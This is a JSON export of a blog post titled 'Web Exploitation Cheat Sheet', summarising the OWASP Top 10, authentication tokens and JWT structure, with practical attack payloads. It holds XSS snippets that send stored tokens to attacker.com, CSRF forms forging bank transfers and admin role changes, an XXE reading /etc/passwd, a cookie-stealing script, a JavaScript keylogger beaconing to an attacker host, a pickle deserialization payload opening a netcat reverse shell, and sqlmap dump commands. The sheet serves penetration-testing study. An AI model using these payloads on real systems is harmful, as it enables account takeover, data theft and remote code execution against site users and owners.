{"id":2656,"date":"2022-01-04T03:02:48","date_gmt":"2022-01-04T03:02:48","guid":{"rendered":"https:\/\/dft.wiki\/?p=2656"},"modified":"2026-04-22T17:52:24","modified_gmt":"2026-04-22T21:52:24","slug":"web-exploitation-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=2656","title":{"rendered":"Web Exploitation Cheat Sheet"},"content":{"rendered":"<p>Web exploitation cannot happen without <strong>proxying and advanced tools<\/strong> such as:<\/p>\n<ul>\n<li><strong>Burp Suite<\/strong>\n<ul>\n<li>Not open-source, but it offers a free community edition [<a href=\"https:\/\/portswigger.net\/burp\/communitydownload\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<li><strong>OpenVAS<\/strong>\n<ul>\n<li>Free and open-source [<a href=\"https:\/\/www.openvas.org\/\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p>It is fundamental to master all <strong>OWASP TOP 10<\/strong> vulnerabilities.<\/p>\n<ul>\n<li><strong>A01:2021 &#8211; Broken Access Control<\/strong>\n<ul>\n<li>Incorrectly implemented authentication and session management controls.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A02:2021 &#8211; Cryptographic Failures<\/strong>\n<ul>\n<li>Failure to protect data in transit and at rest. Examples: plain-text passwords, not using SSL\/TLS&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A03:2021 &#8211; Injection<\/strong>\n<ul>\n<li>Untrusted input is inserted (or injected) into a query or command so that it is interpreted as if it were part of the program&#8217;s code.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A04:2021 &#8211; Insecure Design<\/strong>\n<ul>\n<li>Missing or ineffective controls in the design of the application.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A05:2021 &#8211; Security Misconfiguration<\/strong>\n<ul>\n<li>Misconfigured access controls, such as default credentials or empty passwords.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A06:2021 &#8211; Vulnerable and Outdated Components<\/strong>\n<ul>\n<li>When the software is vulnerable, unsupported, or out of date. 
Including the OS, dependencies&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A07:2021 &#8211; Identification and Authentication Failures<\/strong>\n<ul>\n<li>Failure to confirm the user&#8217;s identity, authentication, and session management.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A08:2021 &#8211; Software and Data Integrity Failures<\/strong>\n<ul>\n<li>Data integrity issues related to code or infrastructure. Violations caused by libraries from untrusted sources, CDNs&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A09:2021 &#8211; Security Logging and Monitoring Failures<\/strong>\n<ul>\n<li>Failures to detect, escalate, and respond to active breaches.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A10:2021 &#8211; Server-Side Request Forgery (SSRF)<\/strong>\n<ul>\n<li>Flaws that occur whenever a web application fetches a remote resource without validating the user-supplied URL.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p><strong>AUTHENTICATION<\/strong><\/p>\n<ul>\n<li><strong>Basic Auth<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token punctuation\">:<\/span> <span class=\"token header-value\">Basic dXNlcm5hbWU6cGFzc3dvcmQ=<\/span><\/pre>\n<\/li>\n<li>Where <code>dXNlcm5hbWU6cGFzc3dvcmQ=<\/code> is <code>username:password<\/code> encoded in Base64.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Session Token<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token punctuation\">:<\/span> <span class=\"token header-value\">Bearer 68e8c01795215bc01492faf3403a400c<\/span><\/pre>\n<\/li>\n<li>Where <code>68e8c01795215bc01492faf3403a400c<\/code> is just an opaque, randomly generated value stored on the server.<\/li>\n<li>It requires a server-side look-up for each request (in-memory store or database), where it can be revoked if compromised.<\/li>\n<\/ul>\n<\/li>\n<li><strong>JWT<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token 
punctuation\">:<\/span> <span class=\"token header-value\">Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9<strong><span style=\"color: #ff0000;\">.<\/span><\/strong>eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0<span style=\"color: #ff0000;\"><strong>.<\/strong><\/span>KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30<\/span><\/pre>\n<\/li>\n<li>The token can be divided into three parts:\n<ul>\n<li><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9<\/code> is the header,<\/li>\n<li><code>eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0<\/code> is the payload,<\/li>\n<li><code>KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30<\/code> is the signature.<\/li>\n<li>The signature makes the token self-contained: the server can verify it without a look-up and will accept it until it expires (it cannot be revoked).<\/li>\n<\/ul>\n<\/li>\n<li>The header defines how the header+payload are signed. Typically, <strong>HS256<\/strong> (symmetric) or <strong>RS256<\/strong> (asymmetric).\n<ul>\n<li>A common mistake is not verifying the signature (accepting <code>\"alg\": \"none\"<\/code>, optionally with the signature removed entirely).<\/li>\n<li>If the server-side key is exposed, try to force <strong>HS256<\/strong> and sign the token with the symmetric key.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>On the client side, the authentication token is typically stored in one of the following ways.<\/p>\n<ul>\n<li><strong>Local Storage<\/strong>\n<ul>\n<li>It can be read by any script running on the page.<\/li>\n<li>Susceptible to <strong>XSS<\/strong> attacks:\n<ul>\n<li>\n<pre>fetch(`https:\/\/attacker.com\/steal?data=${localStorage.getItem('token')}`);<\/pre>\n<\/li>\n<li>\n<pre>new Image().src = 
`https:\/\/attacker.com\/log?token=${localStorage.getItem('auth_token')}`;<\/pre>\n<\/li>\n<li>\n<pre>location.replace(`https:\/\/attacker.com\/collect?token=${localStorage.getItem('session')}`);<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>HTTP-Only<\/strong>\n<ul>\n<li>The token is stored in an <code>HttpOnly<\/code> cookie at the browser level, so JavaScript cannot read it.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Cookie<\/strong>\n<ul>\n<li>When <code>samesite=none<\/code>, the browser attaches the cookie to every request to that site, including cross-site requests made by pages on other origins.<\/li>\n<li>Susceptible to <strong>CSRF<\/strong> attacks:\n<ul>\n<li><strong>Reflected<\/strong>\n<ul>\n<li>It is delivered to the victim through an external link, a spoofed website, or a malicious email.<\/li>\n<li>The malicious website contains hidden code that makes a request to the vulnerable website on behalf of the user.<\/li>\n<li>If the user is already authenticated on the vulnerable site, the browser will send a valid session token.<\/li>\n<li>\n<pre>&lt;img src=\"https:\/\/bank.com\/transfer?amount=10000&amp;to=AttackerID\" width=\"0\" height=\"0\" \/&gt;<\/pre>\n<\/li>\n<li>\n<pre>&lt;form id=\"steal\" action=\"https:\/\/bank.com\/transfer\" method=\"POST\"&gt;\r\n&lt;input type=\"hidden\" name=\"amount\" value=\"10000\" \/&gt;\r\n&lt;input type=\"hidden\" name=\"to\" value=\"AttackerID\" \/&gt;\r\n&lt;\/form&gt;&lt;script&gt;document.getElementById('steal').submit();&lt;\/script&gt;<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Stored<\/strong> \/ <strong>DOM-Based<\/strong>\n<ul>\n<li>The malicious code, typically JavaScript or HTML, is <strong>stored<\/strong> (persistently) in the vulnerable website, which does not properly sanitize\/validate users&#8217; input (e.g., posts, messages).<\/li>\n<li>Any user who views the infected page (like a forum thread, a profile, or a support ticket) will unknowingly execute the attack.<\/li>\n<li>Because the request originates from the same domain as the vulnerable site, it is 
highly effective at bypassing browser security settings and is often harder for users to detect.<\/li>\n<li>The difference between <strong>DOM-Based<\/strong> and stored is that the DOM-based variant is injected during the live rendering of the page rather than persisted on the server, but it has the same impact and capability.<\/li>\n<li>\n<pre>&lt;img src=\"https:\/\/vulnerable-site.com\/api\/delete-account\" width=\"0\" height=\"0\" \/&gt;<\/pre>\n<\/li>\n<li>\n<pre>&lt;script&gt;\r\nfetch('https:\/\/vulnerable-site.com\/api\/update-role', {\r\nheaders: { 'Content-Type': 'application\/x-www-form-urlencoded' },\r\nmethod: 'POST', body: 'user_id=attacker_id&amp;role=admin',\r\ncredentials: 'include' });\r\n&lt;\/script&gt;<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Some of these attacks can be prevented with <code>samesite=strict<\/code>, but not all.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p><strong>MORE PAYLOADS<\/strong><\/p>\n<ul>\n<li><strong>XXE<\/strong> (XML eXternal Entity attack)<\/li>\n<\/ul>\n<pre>&lt;?xml version=\"1.0\"?&gt;\r\n&lt;!DOCTYPE root [&lt;!ENTITY read SYSTEM 'file:\/\/\/etc\/passwd'&gt;]&gt;\r\n&lt;root&gt;&amp;read;&lt;\/root&gt;<\/pre>\n<ul>\n<li><strong>XSS<\/strong> (possible in JavaScript, VBScript, Flash, and CSS)<\/li>\n<\/ul>\n<p>It is worth mentioning the popular sources of payloads: PayLoadBox [<a href=\"https:\/\/github.com\/payloadbox\/xss-payload-list\">Link<\/a>], XSS-Payloads [<a href=\"http:\/\/www.xss-payloads.com\/\">Link<\/a>].<\/p>\n<p><strong>Quick tests<\/strong> for low-hanging fruit:<\/p>\n<pre>&lt;script&gt;alert(1)&lt;\/script&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;image src=\"javascript:alert(1)\"&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;img \\x00src=x onerror=\"alert(1)\"&gt;<\/pre>\n<p>A payload for <strong>stealing 
Cookies<\/strong>:<\/p>\n<pre>&lt;script&gt;document.location='http:\/\/ip:port\/?='+document.cookie;&lt;\/script&gt;<\/pre>\n<p>A very simple <strong>key logger<\/strong>:<\/p>\n<pre>&lt;script&gt;\r\nvar keys='';\r\ndocument.onkeypress = function(e) {\r\n  get = window.event?event:e;\r\n  key = get.keyCode?get.keyCode:get.charCode;\r\n  key = String.fromCharCode(key);\r\n  keys+=key;\r\n}\r\nwindow.setInterval(function(){\r\n  new Image().src = 'http<span style=\"color: #ff0000;\"><strong>s<\/strong><\/span>:\/\/<strong>attackerAddress<\/strong>\/<strong>kl<\/strong>.php?c='+keys;\r\n  keys = '';\r\n}, 1000);\r\n&lt;\/script&gt;<\/pre>\n<ul>\n<li><strong>Insecure Deserialization<\/strong> (Python pickle; the output of the following script is the payload)<\/li>\n<\/ul>\n<pre>import pickle\r\nimport sys\r\nimport base64\r\ncommand = 'rm \/tmp\/f; mkfifo \/tmp\/f; cat \/tmp\/f | ' '\/bin\/sh -i 2&gt;&amp;1 | netcat <strong>10.10.10.10 4444<\/strong> &gt; \/tmp\/f'\r\nclass rce(object):\r\n    def __reduce__(self):\r\n        import os\r\n        return (os.system,(command,))\r\nprint(base64.b64encode(pickle.dumps(rce())))<\/pre>\n<hr \/>\n<p><strong>INJECTION<\/strong><\/p>\n<ul>\n<li><strong>SQLmap<\/strong> &#8211; SQL injection and database takeover [<a href=\"https:\/\/sqlmap.org\/\">Link<\/a>]:<\/li>\n<\/ul>\n<pre>sqlmap -r <strong>requestFile<\/strong>\r\nsqlmap -r <strong>requestFile<\/strong> --dump<\/pre>\n<p>Note: the <strong>requestFile<\/strong> contains the captured HTTP request that SQLmap uses as the template for its injection attempts.<\/p>\n<p>See more usage and examples of <strong>SQLmap<\/strong> in the other post [<a href=\"https:\/\/dft.wiki\/?p=822#SQLmap\">Link<\/a>].<\/p>\n<hr \/>\n<p><strong>MORE ON JWT<\/strong><\/p>\n<p>&lt;HEADER&gt;<strong>.<\/strong>&lt;BODY&gt;<strong>.<\/strong>&lt;SIGNATURE&gt;<\/p>\n<p>Handy online tools [<a href=\"https:\/\/jwt.io\/\">Link<\/a>] and [<a 
href=\"https:\/\/dinochiesa.github.io\/jwt\/\">Link<\/a>].<\/p>\n<ul>\n<li><strong>Header<\/strong>\n<ul>\n<li><code>alg<\/code> (Algorithm)\n<ul>\n<li><code>ES256<\/code> ECDSA with P-256 and SHA-256 (asymmetric).<\/li>\n<li><code>RS256<\/code> RSA with SHA-256 (asymmetric).<\/li>\n<li><code>HS256<\/code> HMAC with SHA-256 (<span style=\"text-decoration: underline; color: red;\">symmetric<\/span>).<\/li>\n<li>and others.<\/li>\n<\/ul>\n<\/li>\n<li><code>typ<\/code> (Type)\n<ul>\n<li><code>JWT<\/code> JSON Web Token. Default value.<\/li>\n<li><code>JWS<\/code> JSON Web Signature, which is a signed JSON.<\/li>\n<li><code>JWE<\/code> JSON Web Encryption, which is an encrypted JSON.<\/li>\n<\/ul>\n<\/li>\n<li><code>kid<\/code> (Key ID)\n<ul>\n<li>It identifies the key used to sign the JWT.<\/li>\n<\/ul>\n<\/li>\n<li><code>jku<\/code> (JWK Set URL)\n<ul>\n<li>Contains the URL of a JWK Set, a JSON document holding the public key(s) as an array of <code>keys<\/code>.<\/li>\n<li>Most popular: <strong>RSA<\/strong>\n<ul>\n<li><code>use<\/code> (intended Use) = <code>sig<\/code><\/li>\n<li><code>n<\/code> (Modulus) = <code>Eq4...x3JjcHw<\/code><\/li>\n<li><code>e<\/code> (Exponent) = <code>AQAB<\/code><\/li>\n<li><code>alg<\/code> (Algorithm) = <code>RS256<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Most secure: <strong>EC<\/strong>\n<ul>\n<li><code>crv<\/code> (Curve) = <code>P-256<\/code><\/li>\n<li><code>x<\/code> (Coordinate in Base64) = <code>Usdf...Tou87Fs<\/code><\/li>\n<li><code>y<\/code> (Coordinate in Base64) = <code>x9KJjo...MJ89x<\/code><\/li>\n<li><code>alg<\/code> (Algorithm) = <code>ES256<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Payload<\/strong>\n<ul>\n<li>Any JSON object (the claims).<\/li>\n<\/ul>\n<\/li>\n<li><strong>Signature<\/strong>\n<ul>\n<li>It is a hash-like value produced by applying a cryptographic function (an HMAC or a digital signature) to the header and the payload.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Web exploitation cannot 
happen without proxying and advanced tools such as. Burp Suite Not open-source, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-2656","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2656"}],"version-history":[{"count":17,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions"}],"predecessor-version":[{"id":5514,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions\/5514"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}